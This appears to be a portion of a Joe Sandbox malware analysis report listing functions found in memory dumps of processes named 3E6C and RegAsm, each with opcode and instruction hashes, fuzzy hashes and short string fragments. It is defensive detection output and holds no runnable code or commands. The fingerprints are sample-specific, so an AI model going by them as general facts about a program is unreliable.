                                                                                                                                                                                  • Opcode ID: a03f2c43d78c03df0dadf584991be9a879be6864a8e0da4d7b890bb7b73316e4
                                                                                                                                                                                  • Instruction ID: 233d2cba86a798cb1aee1122804984aaee56ee9cb5ae429c8947727dd1f30375
                                                                                                                                                                                  • Opcode Fuzzy Hash: a03f2c43d78c03df0dadf584991be9a879be6864a8e0da4d7b890bb7b73316e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF05E30A0E3C5AFC743DBB4AA644AA7FB4EF53210B1940EBC484DB2A3E5345E09D712
                                                                                                                                                                                  Function 015008C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c949e106ca4b9a8bf18c3492b1aa310537803b59a545a944d8ce831793490667
                                                                                                                                                                                  • Instruction ID: 10778c33e4d3f9ffca7b8541b04307918e03ace4f168cedcae500f296c72d28c
                                                                                                                                                                                  • Opcode Fuzzy Hash: c949e106ca4b9a8bf18c3492b1aa310537803b59a545a944d8ce831793490667
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EE0E2A298E3C1AFD7030FF469291E43FB09C6702031D05E7D884CB1A3E09C462ACB56
                                                                                                                                                                                  Function 0150FD68 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4dc4e28e504d2bc7af672597aac70281b06564362c6b64f26b5290a578d5c76a
                                                                                                                                                                                  • Instruction ID: 782f2929666d3b89819eacbc9b3b465fd2d15bf6a1f59d49ba196695e6e4df09
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dc4e28e504d2bc7af672597aac70281b06564362c6b64f26b5290a578d5c76a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF0A575E04208EFCB95DFE8E844A9DBBF5FB48310F10C1AAA81897351D7369A52DF80
                                                                                                                                                                                  Function 075FCDC8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction ID: 7584f9822f5e55511f5d9eb563dde08f19d5e9217aa776eac58aac9245945e7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29E0A5B4E04208AFCB84DFA8D444A9DBBB4BB49310F10C1AA9809D3351D6319A51DB90
                                                                                                                                                                                  Function 075FA070 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction ID: 0582a11c573e5c522802ad03b5471eacc7e2c59b59ca5e7d4e4f7b931a83f816
                                                                                                                                                                                  • Opcode Fuzzy Hash: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE0C9B4E04208EFCB94DFA8E4446ADBBF5FB49310F10C1AA981893351D7319A51DF81
                                                                                                                                                                                  Function 075F58A8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction ID: 0652f8636ae78f4cfa14f30a02bd5c49e4a6806a2e74dcbfd5c401de244e4d05
                                                                                                                                                                                  • Opcode Fuzzy Hash: e88e27077e4ecc0925dea49a271f89f17f1204e622d27856b236e457d38bfff3
                                                                                                                                                                                  • Instruction Fuzzy Hash: FBE0C9B4E04208EFCB84EFA8D44469DBBF4FB49310F10C1AA980893351D7359A51DF80
                                                                                                                                                                                  Function 075FFA38 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1894b6046d7b8ad04e1c9bb8e39ba856f09d179e7fbd79aed03beb4230175ff6
                                                                                                                                                                                  • Instruction ID: c9159e2a1ca0423e811dc0a60cf48c770dd1a7ddef1dbd9b72fa7304b58a2ce9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1894b6046d7b8ad04e1c9bb8e39ba856f09d179e7fbd79aed03beb4230175ff6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE086B4909108EFCB04DF94E8409ADBFB8BB46314F14E1A9E94857381CF319A41DB90
                                                                                                                                                                                  Function 075E029B Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 18a014d3ee4c89dac6a732918e0dfc0fe39266e41b22c0713094fd5a913919a1
                                                                                                                                                                                  • Instruction ID: de9ba5f8dca6a13969eb32bd51f79165d7bba5ca2ef84a271aac78bcd6873a9d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a014d3ee4c89dac6a732918e0dfc0fe39266e41b22c0713094fd5a913919a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0B274E022288FCB68DF28DAA45E9BBF5FB48300F1040E9D949A7391D6309E80CF90
                                                                                                                                                                                  Function 075F8690 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8afec4a8a4cf1ab7e3f33fcce7e23b51b07fe1a0857d2d569e65c4cbd0859c99
                                                                                                                                                                                  • Instruction ID: 654016539511d995e61f02fcbfea560aa5f2474a1fc2b453012f837b91850fdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8afec4a8a4cf1ab7e3f33fcce7e23b51b07fe1a0857d2d569e65c4cbd0859c99
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE01A74D08108EFCB44DB98D4416ACBBB4EB89204F20C1EAD81853341CA31AA42DB80
                                                                                                                                                                                  Function 0150ED40 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ab343396a46f51593b4857873bef1586ab678d18a8d4ff8ab9dbb7e2be205664
                                                                                                                                                                                  • Instruction ID: 01f959f72be961a4360ab6d4f933e2b092f7fe728df5c0025726ec8b65b1d547
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab343396a46f51593b4857873bef1586ab678d18a8d4ff8ab9dbb7e2be205664
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07E0C27280120CDFCB41EFF9E40868EBBB9EB0A204F1044A5E00997160EF324A00E7A2
                                                                                                                                                                                  Function 075FDB88 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 885f458509e448e4af0f4215a27a64779efd4907dac03b9276765105c04f4f5d
                                                                                                                                                                                  • Instruction ID: 6157db16280818ab5be8a9182e45efd0a966923976551b758898b0c4485105e6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 885f458509e448e4af0f4215a27a64779efd4907dac03b9276765105c04f4f5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: B6E012B4A09208EFCB04EF94E5555ADBBB8FB86314F20D19DDC0817351CB325E42DB81
                                                                                                                                                                                  Function 075FCD80 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 94b286f3f6b991726dfe649a1052a91a81c4a5dc48581af77f00f4d3c71c1daa
                                                                                                                                                                                  • Instruction ID: 29dd0f5e8ccea0c5be02c7809bf77e25654b3181d57b7386479577dc75ba8cd9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94b286f3f6b991726dfe649a1052a91a81c4a5dc48581af77f00f4d3c71c1daa
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E0C2B154120CAFCB41EFF8D80068E7BB9EB46200F1059E6D00597150EE324A00D7A1
                                                                                                                                                                                  Function 01500888 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c92bf74f5748e3ee4dde7578de71b8b8c42aabcc6a6db3bb029c5f3bcd99a025
                                                                                                                                                                                  • Instruction ID: 2f7c5c6e795b0c4f307bcebb3f9b3f86adc805b4e4b81a033c8e77273b65c3f9
                                                                                                                                                                                  • Opcode Fuzzy Hash: c92bf74f5748e3ee4dde7578de71b8b8c42aabcc6a6db3bb029c5f3bcd99a025
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4D01734A1120DFF8B44EFA8EA5056DB7B9FB44200B1081A9D908D7255EA316E049B80
                                                                                                                                                                                  Function 01500953 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d5dd98868ba9a6a21e4be33e603a8c59f15f24721293f8dc517eb307c436312e
                                                                                                                                                                                  • Instruction ID: 8481bf5b4101365f2419f756195df2b2fac231f99c4b9f4bacf4f2f0214c42b7
                                                                                                                                                                                  • Opcode Fuzzy Hash: d5dd98868ba9a6a21e4be33e603a8c59f15f24721293f8dc517eb307c436312e
                                                                                                                                                                                  • Instruction Fuzzy Hash: ECD05E36900420CFE7168F59D84835573F0BB04380F4AC471E58AAB5D5DB30F9068B42
                                                                                                                                                                                  Function 0150EBB0 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0e1e7379cd3a42140f20322320dcc97986e2a1be3e5013daa4aef5e5c7c3c5ae
                                                                                                                                                                                  • Instruction ID: 6fe4c32cb076a8bdc179c9a0a7d7c2c5599ef13ccd4e4a02824d4464218a25e9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e1e7379cd3a42140f20322320dcc97986e2a1be3e5013daa4aef5e5c7c3c5ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: C3C08C30009A0A4AC1A177EDB40A32C7A78AB4120EF805111F24C200928F710040C3BA
                                                                                                                                                                                  Function 015008F0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e71a9025284b09a060425685bafed52871fab33ac466edf99d16664d159f8a42
                                                                                                                                                                                  • Instruction ID: fba738acbb8c6af0f461a235faa9e28b86fe1ba91cf95e9d7f3f07a345868c6f
                                                                                                                                                                                  • Opcode Fuzzy Hash: e71a9025284b09a060425685bafed52871fab33ac466edf99d16664d159f8a42
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C90023144460D8F46502B95741D555775DA544515B844061E50D41555DA69681046D9

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 02CB2009 Relevance: 16.4, Strings: 12, Instructions: 1360COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                  • API String ID: 0-312445597
                                                                                                                                                                                  • Opcode ID: 44720095d882c076259fa7a53d7f160c7fdf6ff6c6639ed091e7637172cdeb45
                                                                                                                                                                                  • Instruction ID: 3baa7ff0ca299b719d10aa183428b28a37552182ae33d8a038fc8301517abbf1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44720095d882c076259fa7a53d7f160c7fdf6ff6c6639ed091e7637172cdeb45
                                                                                                                                                                                  • Instruction Fuzzy Hash: B9D22A34A00218DFDB25DF65D894AEEB7B6FF98300F148595E9069B398CB349D42CF91
                                                                                                                                                                                  Function 02CB2282 Relevance: 8.2, Strings: 6, Instructions: 696COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                                                                                                  • API String ID: 0-2546334966
                                                                                                                                                                                  • Opcode ID: 544a6e5e99e46ec6296dad399ab8cff1fee87e5e1ae24043b8ce8fda168a1866
                                                                                                                                                                                  • Instruction ID: 58de2939a44a9255279d5af34efc269f3b663b0de48627ed9fe19eeedb9ea2bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 544a6e5e99e46ec6296dad399ab8cff1fee87e5e1ae24043b8ce8fda168a1866
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B622D30A00228DFDB25EF65DC94BEAB7B2FF98300F548595D9099B298CB349D45CF91
                                                                                                                                                                                  Function 01012B78 Relevance: 8.2, Strings: 6, Instructions: 683COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$TJcq$TJcq$Te^q$pbq$xbaq
                                                                                                                                                                                  • API String ID: 0-50452399
                                                                                                                                                                                  • Opcode ID: 0a4b7bedd1644be1bdfd54befddd035345433fee096200c7711b1b724cb5b856
                                                                                                                                                                                  • Instruction ID: 29d7e8b87eca3f1c91b3822ef8991ef1e7954a728d3ffa7ccd282b26522bd3fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4b7bedd1644be1bdfd54befddd035345433fee096200c7711b1b724cb5b856
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66521335A001189FCB59DFA8C984EA9BBF2FF48314F1581A8E5499B276CB35EC91DF40
                                                                                                                                                                                  Function 053225E0 Relevance: 4.3, Strings: 3, Instructions: 559COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq
                                                                                                                                                                                  • API String ID: 0-2297679979
                                                                                                                                                                                  • Opcode ID: e1f1b6715805b0d4e1d87e1d4dd816a1d455d4735fcc0242580972e3d9d924c4
                                                                                                                                                                                  • Instruction ID: e6780b660727ec6baf8747da6d119100bc3797909fd24fb5c3a344f8ee17581c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e1f1b6715805b0d4e1d87e1d4dd816a1d455d4735fcc0242580972e3d9d924c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 37326C74A102248FCB25EF65DC84AAEB7B2FF88300F508569E50697799DB70AD45CF90
                                                                                                                                                                                  Function 02CB6C1E Relevance: 3.3, Strings: 2, Instructions: 820COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $^q$$^q
                                                                                                                                                                                  • API String ID: 0-355816377
                                                                                                                                                                                  • Opcode ID: 7ad98cfdb5bcf82d3c5ba8e7202b7c16c386a4cdc3970ab235d3ed1516979479
                                                                                                                                                                                  • Instruction ID: 3577589df6cc9c437502d17ae3731c7bd251d7d1dcbdb0833c879822b0cf1266
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad98cfdb5bcf82d3c5ba8e7202b7c16c386a4cdc3970ab235d3ed1516979479
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D72B174A001259FCB15EF65D891AAEB7F6FFD8304F148655E902AB3C8CB74AD02CB90
                                                                                                                                                                                  Function 01012808 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: ab12e2567f9203ae896d785a261f82e5b9928515165e2a2619bf465c8968c6bc
                                                                                                                                                                                  • Instruction ID: 3dfd384e8f0508d51f5e623104f65eb9858f13249e4b4edd9c8e2ea2a35b8d2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab12e2567f9203ae896d785a261f82e5b9928515165e2a2619bf465c8968c6bc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B515371A106048FD708EF7BF995A99BFE3BFD8300F14DA29D0049B2A9EF7459059B90
                                                                                                                                                                                  Function 01012818 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                                  • Opcode ID: 4f2b88b5b15e37ba76cbc0a7dafe77251423282cdef14bb9e0a9e8d072fefb4b
                                                                                                                                                                                  • Instruction ID: 84dfdbb5067e7cf2f47c137ac8758e2c1c8abc523b3af1642af24b55312f995d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2b88b5b15e37ba76cbc0a7dafe77251423282cdef14bb9e0a9e8d072fefb4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9513E70A106048FD708EF7BE995A99BFE3BFD8300F14DA29D0049B2A9EF7459059B90
                                                                                                                                                                                  Function 02CB8F48 Relevance: 2.0, Strings: 1, Instructions: 704COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (_^q
                                                                                                                                                                                  • API String ID: 0-538443824
                                                                                                                                                                                  • Opcode ID: 6f037d65c94db0c3d1a26bc2ff00c69cf39f2cd4c767bbd38dfd25f91f591050
                                                                                                                                                                                  • Instruction ID: 22d5f0475aadcfb46dbeb02f498f99875cc34a6d4ee71006fbd94f3d537593b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f037d65c94db0c3d1a26bc2ff00c69cf39f2cd4c767bbd38dfd25f91f591050
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85529034B50114DBCB15EFAAD8946AE77B2EFC8304F548569EA069B389CF749D02CF90
                                                                                                                                                                                  Function 0532E550 Relevance: .5, Instructions: 503COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 531bc1dcb44f5cb4ae60b464764aa39e8862315e72a9f4da2c14e7dafcc19481
                                                                                                                                                                                  • Instruction ID: 0db946cb004d41032f23978cc4378ee13af9caa84686a3938448152f90306422
                                                                                                                                                                                  • Opcode Fuzzy Hash: 531bc1dcb44f5cb4ae60b464764aa39e8862315e72a9f4da2c14e7dafcc19481
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8125030B106249FCB19FFA5D8959AEB7B6FF98300F508628D906A7398DF349D45DB80
                                                                                                                                                                                  Function 05336CDB Relevance: .4, Instructions: 363COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0e1b20ed77b7d95511f1a1bce61467f80cc174bbbcf5fe90e82ff296bd96d932
